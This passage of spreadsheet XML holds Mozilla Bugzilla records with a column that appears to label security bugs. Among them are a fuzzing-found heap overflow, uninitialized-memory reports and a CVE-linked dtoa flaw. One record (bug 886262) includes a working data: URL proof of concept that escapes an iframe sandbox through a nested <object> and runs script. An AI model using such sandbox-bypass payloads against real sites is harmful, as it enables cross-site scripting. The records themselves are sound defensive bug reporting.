It should only open http/s (maybe other) URI schemes.</t>
        </is>
      </c>
      <c r="X2275" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2276">
      <c r="A2276" t="n">
        <v>886262</v>
      </c>
      <c r="B2276" t="inlineStr">
        <is>
          <t>2013-06-24 03:18:38 -0700</t>
        </is>
      </c>
      <c r="C2276" t="inlineStr">
        <is>
          <t>HTML &lt;object&gt;s do not  inherit sandbox flags from their parents.</t>
        </is>
      </c>
      <c r="D2276" t="inlineStr">
        <is>
          <t>2015-02-25 20:20:37 -0800</t>
        </is>
      </c>
      <c r="E2276" t="n">
        <v>1</v>
      </c>
      <c r="F2276" t="n">
        <v>1</v>
      </c>
      <c r="G2276" t="n">
        <v>3</v>
      </c>
      <c r="H2276" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2276" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2276" t="inlineStr">
        <is>
          <t>DOM: Navigation</t>
        </is>
      </c>
      <c r="K2276" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2276" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2276" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2276" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2276" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2276" t="inlineStr">
        <is>
          <t>[adv-main26+] Could contribute to XSS on sites relying on sandbox</t>
        </is>
      </c>
      <c r="Q2276" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2276" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2276" t="inlineStr">
        <is>
          <t>mozilla26</t>
        </is>
      </c>
      <c r="T2276" t="n">
        <v>1</v>
      </c>
      <c r="U2276" t="n">
        <v>0</v>
      </c>
      <c r="V2276" t="n">
        <v>48</v>
      </c>
      <c r="W2276" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #849791 +++
Should &lt;object&gt;s containing HTML content--that is, rendered by us rather than plugin content--be considered equivalent to an &lt;iframe&gt; for sandbox purposes? Bug 849791 was about evading iframe sandbox restrictions by using a nested &lt;frameset&gt;, but you can accomplish the same evasion using &lt;object&gt;
The following runs script
data:text/html,&lt;iframe%20sandbox%20src="data:text/html,&lt;object%20data='data:text/html,&lt;script&gt;alert(parent.document.location)&lt;/script&gt;'&gt;&lt;/object&gt;"&gt;&lt;/iframe&gt;
I expected it to behave like the following which doesn't:
data:text/html,&lt;iframe%20sandbox%20src="data:text/html,&lt;iframe%20src='data:text/html,&lt;script&gt;alert(parent.document.location)&lt;/script&gt;'&gt;&lt;/iframe&gt;"&gt;&lt;/iframe&gt;
If the sandbox has allow-same-origin set then the scripts in the object can interact with the top-level document.</t>
        </is>
      </c>
      <c r="X2276" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2277">
      <c r="A2277" t="n">
        <v>485142</v>
      </c>
      <c r="B2277" t="inlineStr">
        <is>
          <t>2009-03-25 01:32:06 -0700</t>
        </is>
      </c>
      <c r="C2277" t="inlineStr">
        <is>
          <t>Dates are mixed up in a calendar entry</t>
        </is>
      </c>
      <c r="D2277" t="inlineStr">
        <is>
          <t>2010-05-28 10:25:56 -0700</t>
        </is>
      </c>
      <c r="E2277" t="n">
        <v>1</v>
      </c>
      <c r="F2277" t="n">
        <v>1</v>
      </c>
      <c r="G2277" t="n">
        <v>5</v>
      </c>
      <c r="H2277" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2277" t="inlineStr">
        <is>
          <t>quality.mozilla.org</t>
        </is>
      </c>
      <c r="J2277" t="inlineStr">
        <is>
          <t>Website</t>
        </is>
      </c>
      <c r="K2277" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2277" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2277" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2277" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2277" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2277" t="inlineStr"/>
      <c r="Q2277" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2277" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2277" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2277" t="n">
        <v>1</v>
      </c>
      <c r="U2277" t="n">
        <v>0</v>
      </c>
      <c r="V2277" t="n">
        <v>12</v>
      </c>
      <c r="W2277" t="inlineStr">
        <is>
          <t>Created attachment 369237
Normal view 
I created an event for April 2 2009. I then edited the event to change a few typo. For some unknown reason my event now displays it's date as first of April and If I switch the view to edit it shows the date as being the second of april. Would be nice that the event displays itself as the 2 of april.</t>
        </is>
      </c>
      <c r="X2277" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2278">
      <c r="A2278" t="n">
        <v>1243823</v>
      </c>
      <c r="B2278" t="inlineStr">
        <is>
          <t>2016-01-28 10:31:40 -0800</t>
        </is>
      </c>
      <c r="C2278" t="inlineStr">
        <is>
          <t>graphite2: heap-buffer-overflow read in [@graphite2::TtfUtil::CmapSubtable12Lookup]</t>
        </is>
      </c>
      <c r="D2278" t="inlineStr">
        <is>
          <t>2016-09-22 14:48:40 -0700</t>
        </is>
      </c>
      <c r="E2278" t="n">
        <v>1</v>
      </c>
      <c r="F2278" t="n">
        <v>1</v>
      </c>
      <c r="G2278" t="n">
        <v>3</v>
      </c>
      <c r="H2278" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2278" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2278" t="inlineStr">
        <is>
          <t>Graphics: Text</t>
        </is>
      </c>
      <c r="K2278" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2278" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2278" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2278" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2278" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2278" t="inlineStr">
        <is>
          <t>[adv-main45+][adv-esr38.7+]</t>
        </is>
      </c>
      <c r="Q2278" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2278" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2278" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2278" t="n">
        <v>1</v>
      </c>
      <c r="U2278" t="n">
        <v>0</v>
      </c>
      <c r="V2278" t="n">
        <v>7</v>
      </c>
      <c r="W2278" t="inlineStr">
        <is>
          <t>Created attachment 8713262
call_stack.txt
This was found while fuzzing graphite2 1.3.4</t>
        </is>
      </c>
      <c r="X2278" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2279">
      <c r="A2279" t="n">
        <v>710079</v>
      </c>
      <c r="B2279" t="inlineStr">
        <is>
          <t>2011-12-12 17:03:34 -0800</t>
        </is>
      </c>
      <c r="C2279" t="inlineStr">
        <is>
          <t>When using imgITools.encodeImage to encode image/vnd.microsoft.icon as png, output is always the same size and contains uninitialized bytes</t>
        </is>
      </c>
      <c r="D2279" t="inlineStr">
        <is>
          <t>2012-03-23 13:30:48 -0700</t>
        </is>
      </c>
      <c r="E2279" t="n">
        <v>1</v>
      </c>
      <c r="F2279" t="n">
        <v>1</v>
      </c>
      <c r="G2279" t="n">
        <v>3</v>
      </c>
      <c r="H2279" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2279" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2279" t="inlineStr">
        <is>
          <t>Graphics: ImageLib</t>
        </is>
      </c>
      <c r="K2279" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2279" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2279" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N2279" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2279" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2279" t="inlineStr">
        <is>
          <t>[sg:high][qa+]</t>
        </is>
      </c>
      <c r="Q2279" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2279" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2279" t="inlineStr">
        <is>
          <t>mozilla10</t>
        </is>
      </c>
      <c r="T2279" t="n">
        <v>1</v>
      </c>
      <c r="U2279" t="n">
        <v>0</v>
      </c>
      <c r="V2279" t="n">
        <v>35</v>
      </c>
      <c r="W2279" t="inlineStr">
        <is>
          <t>Created attachment 581113
Reproducer: Encodes a file as image/vnd.microsoft.icon
I've been using the attached javascript to encode various images as image/vnd.microsoft.icon and write them to (.ico) files.  I've noticed a couple things:
   1) The output is always the exact same number of bytes (8214)
   2) After the end of the valid data, the rest of the file is full of 0xcd bytes in debug builds and (apparently) uninitialized data in release builds - I think this data is uninitialized because converting the same image multiple times gives different results</t>
        </is>
      </c>
      <c r="X2279" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2280">
      <c r="A2280" t="n">
        <v>1391189</v>
      </c>
      <c r="B2280" t="inlineStr">
        <is>
          <t>2017-08-17 01:51:06 -0700</t>
        </is>
      </c>
      <c r="C2280" t="inlineStr">
        <is>
          <t>rotate cot gpg keys for gecko-[1,2,3]-b-win2012</t>
        </is>
      </c>
      <c r="D2280" t="inlineStr">
        <is>
          <t>2017-09-03 23:59:27 -0700</t>
        </is>
      </c>
      <c r="E2280" t="n">
        <v>1</v>
      </c>
      <c r="F2280" t="n">
        <v>1</v>
      </c>
      <c r="G2280" t="n">
        <v>5</v>
      </c>
      <c r="H2280" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2280" t="inlineStr">
        <is>
          <t>Infrastructure &amp; Operations</t>
        </is>
      </c>
      <c r="J2280" t="inlineStr">
        <is>
          <t>RelOps: General</t>
        </is>
      </c>
      <c r="K2280" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2280" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2280" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2280" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2280" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2280" t="inlineStr"/>
      <c r="Q2280" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2280" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2280" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2280" t="n">
        <v>1</v>
      </c>
      <c r="U2280" t="n">
        <v>0</v>
      </c>
      <c r="V2280" t="n">
        <v>5</v>
      </c>
      <c r="W2280" t="inlineStr">
        <is>
          <t>cot gpg keys for gecko-[1,2,3]-b-win2012 will expire on 2017-08-30T00:00:00.000Z and must be rotated before that date to ensure builds do not start failing due to expired keys.
see also: bug 1382131 for wip on changing the process and storage mechanism for rotations.</t>
        </is>
      </c>
      <c r="X2280" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2281">
      <c r="A2281" t="n">
        <v>1357120</v>
      </c>
      <c r="B2281" t="inlineStr">
        <is>
          <t>2017-04-17 09:38:42 -0700</t>
        </is>
      </c>
      <c r="C2281" t="inlineStr">
        <is>
          <t>Create a non-remote solution to enable AS for a partial audience</t>
        </is>
      </c>
      <c r="D2281" t="inlineStr">
        <is>
          <t>2017-04-24 12:12:28 -0700</t>
        </is>
      </c>
      <c r="E2281" t="n">
        <v>1</v>
      </c>
      <c r="F2281" t="n">
        <v>1</v>
      </c>
      <c r="G2281" t="n">
        <v>2</v>
      </c>
      <c r="H2281" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2281" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J2281" t="inlineStr">
        <is>
          <t>Home screen</t>
        </is>
      </c>
      <c r="K2281" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2281" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M2281" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N2281" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2281" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2281" t="inlineStr">
        <is>
          <t>[mobileAS]</t>
        </is>
      </c>
      <c r="Q2281" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2281" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2281" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2281" t="n">
        <v>1</v>
      </c>
      <c r="U2281" t="n">
        <v>0</v>
      </c>
      <c r="V2281" t="n">
        <v>3</v>
      </c>
      <c r="W2281" t="inlineStr">
        <is>
          <t>We need a way of showing Activity Stream to a partial audience. But instead of relying on a remote configuration (switchboard/leanplum) we'd like a simpler solution that uses something like a UUID to enable AS to a partial audience. 
We'll have to do upgrades to the app in order to increase the audience but thats cool!</t>
        </is>
      </c>
      <c r="X2281" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2282">
      <c r="A2282" t="n">
        <v>818241</v>
      </c>
      <c r="B2282" t="inlineStr">
        <is>
          <t>2012-12-04 12:55:05 -0800</t>
        </is>
      </c>
      <c r="C2282" t="inlineStr">
        <is>
          <t>Conditional jump/move depends on uninitialized data in Quartz backend</t>
        </is>
      </c>
      <c r="D2282" t="inlineStr">
        <is>
          <t>2014-11-19 19:36:00 -0800</t>
        </is>
      </c>
      <c r="E2282" t="n">
        <v>1</v>
      </c>
      <c r="F2282" t="n">
        <v>1</v>
      </c>
      <c r="G2282" t="n">
        <v>3</v>
      </c>
      <c r="H2282" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2282" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2282" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K2282" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2282" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2282" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2282" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2282" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2282" t="inlineStr">
        <is>
          <t>[adv-main19+][adv-esr1703+]</t>
        </is>
      </c>
      <c r="Q2282" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2282" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2282" t="inlineStr">
        <is>
          <t>mozilla21</t>
        </is>
      </c>
      <c r="T2282" t="n">
        <v>1</v>
      </c>
      <c r="U2282" t="n">
        <v>0</v>
      </c>
      <c r="V2282" t="n">
        <v>23</v>
      </c>
      <c r="W2282" t="inlineStr">
        <is>
          <t>Launching Firefox on 10.7 inside VMWare, pointing at the URL mentioned here, gives me a slew of warnings of use of uninitialized data, starting with this warning. I suspect that we're using the Quartz backend to draw a screenshot, so it might help to have an empty profile (so Firefox wants to draw a screenshot of the page you're on).
==45780== Conditional jump or move depends on uninitialised value(s)
==45780==    at 0x9F61430: mozilla::gfx::DrawTargetCG::Init(mozilla::gfx::BackendType, unsigned char*, mozilla::gfx::IntSize const&amp;, int, mozilla::gfx::SurfaceFormat) (DrawTargetCG.cpp:884)
==45780==    by 0x9F5E587: mozilla::gfx::DrawTargetCG::Init(mozilla::gfx::BackendType, mozilla::gfx::IntSize const&amp;, mozilla::gfx::SurfaceFormat&amp;) (DrawTargetCG.cpp:974)
==45780==    by 0x9F4A83B: mozilla::gfx::Factory::CreateDrawTarget(mozilla::gfx::BackendType, mozilla::gfx::IntSize const&amp;, mozilla::gfx::SurfaceFormat) (Factory.cpp:193)
==45780==    by 0x9C82B52: gfxPlatform::CreateDrawTargetForBackend(mozilla::gfx::BackendType, mozilla::gfx::IntSize const&amp;, mozilla::gfx::SurfaceFormat) (gfxPlatform.cpp:728)
==45780==    by 0x9C82BDB: gfxPlatform::CreateOffscreenDrawTarget(mozilla::gfx::IntSize const&amp;, mozilla::gfx::SurfaceFormat) (gfxPlatform.cpp:736)
==45780==    by 0x9CB432F: mozilla::layers::LayerManager::CreateDrawTarget(mozilla::gfx::IntSize const&amp;, mozilla::gfx::SurfaceFormat) (Layers.cpp:250)
==45780==    by 0x8A96905: mozilla::dom::CanvasRenderingContext2D::EnsureTarget() (CanvasRenderingContext2D.cpp:792)
==45780==    by 0x8A9772F: mozilla::dom::CanvasRenderingContext2D::Scale(double, double, mozilla::ErrorResult&amp;) (CanvasRenderingContext2D.cpp:1905)
==45780==    by 0x9AE83E2: mozilla::dom::CanvasRenderingContext2DBinding::scale(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::CanvasRenderingContext2D*, unsigned int, JS::Value*) (CanvasRenderingContext2DBinding.cpp:116)
==45780==    by 0x9AEF0C0: mozilla::dom::CanvasRenderingContext2DBinding::genericMethod(JSContext*, unsigned int, JS::Value*) (CanvasRenderingContext2DBinding.cpp:3244)
==45780==    by 0xA2D301B: js::CallJSNative(JSContext*, int (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) (jscntxtinlines.h:364)
==45780==    by 0xA2CE73E: js::InvokeKernel(JSContext*, JS::CallArgs, js::MaybeConstruct) (jsinterp.cpp:362)
==45780==  Uninitialised value was created by a heap allocation
==45780==    at 0x5237: malloc (in /usr/local/Cellar/valgrind/3.8.1/lib/valgrind/vgpreload_memcheck-amd64-darwin.so)
==45780==    by 0x15D68D: operator new(unsigned long) (in /usr/lib/libstdc++.6.0.9.dylib)
==45780==    by 0x9F4A811: mozilla::gfx::Factory::CreateDrawTarget(mozilla::gfx::BackendType, mozilla::gfx::IntSize const&amp;, mozilla::gfx::SurfaceFormat) (Factory.cpp:192)
==45780==    by 0x9C82B52: gfxPlatform::CreateDrawTargetForBackend(mozilla::gfx::BackendType, mozilla::gfx::IntSize const&amp;, mozilla::gfx::SurfaceFormat) (gfxPlatform.cpp:728)
==45780==    by 0x9C82BDB: gfxPlatform::CreateOffscreenDrawTarget(mozilla::gfx::IntSize const&amp;, mozilla::gfx::SurfaceFormat) (gfxPlatform.cpp:736)
==45780==    by 0x9CB432F: mozilla::layers::LayerManager::CreateDrawTarget(mozilla::gfx::IntSize const&amp;, mozilla::gfx::SurfaceFormat) (Layers.cpp:250)
==45780==    by 0x8A96905: mozilla::dom::CanvasRenderingContext2D::EnsureTarget() (CanvasRenderingContext2D.cpp:792)
==45780==    by 0x8A9772F: mozilla::dom::CanvasRenderingContext2D::Scale(double, double, mozilla::ErrorResult&amp;) (CanvasRenderingContext2D.cpp:1905)
==45780==    by 0x9AE83E2: mozilla::dom::CanvasRenderingContext2DBinding::scale(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::CanvasRenderingContext2D*, unsigned int, JS::Value*) (CanvasRenderingContext2DBinding.cpp:116)
==45780==    by 0x9AEF0C0: mozilla::dom::CanvasRenderingContext2DBinding::genericMethod(JSContext*, unsigned int, JS::Value*) (CanvasRenderingContext2DBinding.cpp:3244)
==45780==    by 0xA2D301B: js::CallJSNative(JSContext*, int (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) (jscntxtinlines.h:364)
==45780==    by 0xA2CE73E: js::InvokeKernel(JSContext*, JS::CallArgs, js::MaybeConstruct) (jsinterp.cpp:362)</t>
        </is>
      </c>
      <c r="X2282" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2283">
      <c r="A2283" t="n">
        <v>829723</v>
      </c>
      <c r="B2283" t="inlineStr">
        <is>
          <t>2013-01-11 12:12:44 -0800</t>
        </is>
      </c>
      <c r="C2283" t="inlineStr">
        <is>
          <t>Google Analytics missing from localized PHP pages</t>
        </is>
      </c>
      <c r="D2283" t="inlineStr">
        <is>
          <t>2013-04-01 12:36:22 -0700</t>
        </is>
      </c>
      <c r="E2283" t="n">
        <v>1</v>
      </c>
      <c r="F2283" t="n">
        <v>1</v>
      </c>
      <c r="G2283" t="n">
        <v>5</v>
      </c>
      <c r="H2283" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2283" t="inlineStr">
        <is>
          <t>www.mozilla.org</t>
        </is>
      </c>
      <c r="J2283" t="inlineStr">
        <is>
          <t>Analytics</t>
        </is>
      </c>
      <c r="K2283" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2283" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2283" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2283" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2283" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2283" t="inlineStr">
        <is>
          <t>r=113957,114694,114695</t>
        </is>
      </c>
      <c r="Q2283" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2283" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2283" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2283" t="n">
        <v>1</v>
      </c>
      <c r="U2283" t="n">
        <v>0</v>
      </c>
      <c r="V2283" t="n">
        <v>16</v>
      </c>
      <c r="W2283" t="inlineStr">
        <is>
          <t>It appears that all localized pluginchecker and firstrun pages on the PHP side do not have the Google Analytics tag in them.
Example:
https://www.mozilla.org/pt-BR/plugincheck/
http://www.mozilla.org/es-ES/firefox/18.0/firstrun/</t>
        </is>
      </c>
      <c r="X2283" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2284">
      <c r="A2284" t="n">
        <v>1172947</v>
      </c>
      <c r="B2284" t="inlineStr">
        <is>
          <t>2015-06-09 07:23:20 -0700</t>
        </is>
      </c>
      <c r="C2284" t="inlineStr">
        <is>
          <t>Improve tour panel footer style on Windows</t>
        </is>
      </c>
      <c r="D2284" t="inlineStr">
        <is>
          <t>2016-05-10 09:14:16 -0700</t>
        </is>
      </c>
      <c r="E2284" t="n">
        <v>1</v>
      </c>
      <c r="F2284" t="n">
        <v>1</v>
      </c>
      <c r="G2284" t="n">
        <v>2</v>
      </c>
      <c r="H2284" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2284" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J2284" t="inlineStr">
        <is>
          <t>Theme</t>
        </is>
      </c>
      <c r="K2284" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2284" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2284" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N2284" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2284" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2284" t="inlineStr">
        <is>
          <t>[fxprivacy] [ux-qx] [campaign]</t>
        </is>
      </c>
      <c r="Q2284" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2284" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2284" t="inlineStr">
        <is>
          <t>Firefox 42</t>
        </is>
      </c>
      <c r="T2284" t="n">
        <v>1</v>
      </c>
      <c r="U2284" t="n">
        <v>0</v>
      </c>
      <c r="V2284" t="n">
        <v>15</v>
      </c>
      <c r="W2284" t="inlineStr">
        <is>
          <t>Created attachment 8617336
current tour panel borders.png
When a tour panel has a footer, there is a margin around it that makes it look out of place. We should either remove that margin or re-style the footer.</t>
        </is>
      </c>
      <c r="X2284" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2285">
      <c r="A2285" t="n">
        <v>364637</v>
      </c>
      <c r="B2285" t="inlineStr">
        <is>
          <t>2006-12-21 14:26:33 -0800</t>
        </is>
      </c>
      <c r="C2285" t="inlineStr">
        <is>
          <t>contrib/bzdbcopy.pl: Can't locate object method "params" via package "Bugzilla" at Bugzilla/DB/Mysql.pm line 65</t>
        </is>
      </c>
      <c r="D2285" t="inlineStr">
        <is>
          <t>2006-12-29 15:18:00 -0800</t>
        </is>
      </c>
      <c r="E2285" t="n">
        <v>1</v>
      </c>
      <c r="F2285" t="n">
        <v>1</v>
      </c>
      <c r="G2285" t="n">
        <v>4</v>
      </c>
      <c r="H2285" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2285" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2285" t="inlineStr">
        <is>
          <t>Database</t>
        </is>
      </c>
      <c r="K2285" t="inlineStr">
        <is>
          <t>2.23.3</t>
        </is>
      </c>
      <c r="L2285" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2285" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2285" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2285" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2285" t="inlineStr"/>
      <c r="Q2285" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2285" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2285" t="inlineStr">
        <is>
          <t>Bugzilla 3.0</t>
        </is>
      </c>
      <c r="T2285" t="n">
        <v>1</v>
      </c>
      <c r="U2285" t="n">
        <v>0</v>
      </c>
      <c r="V2285" t="n">
        <v>6</v>
      </c>
      <c r="W2285" t="inlineStr">
        <is>
          <t>$ contrib/bzdbcopy.pl 
Connecting to the 'bugs' source database on Mysql...
Can't locate object method "params" via package "Bugzilla" at Bugzilla/DB/Mysql.pm line 65.
Bugzilla/DB/Mysql.pm uses Bugzilla-&gt;params without adding a use Bugzilla. It should either 'use Bugzilla' or not have a hard dependency.</t>
        </is>
      </c>
      <c r="X2285" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2286">
      <c r="A2286" t="n">
        <v>516862</v>
      </c>
      <c r="B2286" t="inlineStr">
        <is>
          <t>2009-09-15 19:31:31 -0700</t>
        </is>
      </c>
      <c r="C2286" t="inlineStr">
        <is>
          <t>Array indexing error in js/src/dtoa.c's Balloc() leads to floating point memory vulnerability (SA36711)</t>
        </is>
      </c>
      <c r="D2286" t="inlineStr">
        <is>
          <t>2013-03-19 07:29:40 -0700</t>
        </is>
      </c>
      <c r="E2286" t="n">
        <v>1</v>
      </c>
      <c r="F2286" t="n">
        <v>1</v>
      </c>
      <c r="G2286" t="n">
        <v>3</v>
      </c>
      <c r="H2286" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2286" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2286" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2286" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2286" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2286" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2286" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2286" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2286" t="inlineStr">
        <is>
          <t>[sg:critical] same issue as 516396 (CVE-2009-0689)</t>
        </is>
      </c>
      <c r="Q2286" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2286" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2286" t="inlineStr">
        <is>
          <t>mozilla1.9.3a1</t>
        </is>
      </c>
      <c r="T2286" t="n">
        <v>1</v>
      </c>
      <c r="U2286" t="n">
        <v>0</v>
      </c>
      <c r="V2286" t="n">
        <v>79</v>
      </c>
      <c r="W2286" t="inlineStr">
        <is>
          <t>[split from bug 516396]
Secunia notified security@ of a problem in nsprpub/pr/src/misc/prdtoa.c's Balloc() function. The same issue also occurs in js/src/dtoa.c, so the patch from bug 416396 needs to be ported to that copy of dtoa.</t>
        </is>
      </c>
      <c r="X2286" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2287">
      <c r="A2287" t="n">
        <v>1292720</v>
      </c>
      <c r="B2287" t="inlineStr">
        <is>
          <t>2016-08-05 17:43:16 -0700</t>
        </is>
      </c>
      <c r="C2287" t="inlineStr">
        <is>
          <t>Switch to a UCS-4 unicode mode Python on Heroku</t>
        </is>
      </c>
      <c r="D2287" t="inlineStr">
        <is>
          <t>2017-01-11 04:11:14 -0800</t>
